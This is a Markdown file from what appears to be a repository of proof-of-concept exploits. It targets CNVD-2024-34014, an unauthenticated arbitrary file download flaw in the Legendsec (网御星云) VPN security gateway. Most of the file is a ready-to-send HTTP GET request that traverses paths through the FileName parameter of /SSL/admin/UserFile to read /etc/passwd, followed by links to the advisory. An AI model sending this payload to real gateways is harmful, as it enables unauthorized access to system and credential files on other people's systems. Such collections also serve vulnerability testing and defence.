POC/wpoc/网御星云/网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

22 lines
771 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014)
网御VPN安全网关存在任意文件下载漏洞攻击者可利用该漏洞在未经身份验证的情况下下载passwd等敏感文件。
## poc
```javascript
GET /SSL/admin/UserFile?FileName=../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
```
## 漏洞来源
- https://mp.weixin.qq.com/s/UXujNlADrykn2NSREuwDWQ
- [国家信息安全漏洞共享平台 (cnvd.org.cn)](https://www.cnvd.org.cn/flaw/show/CNVD-2024-34014)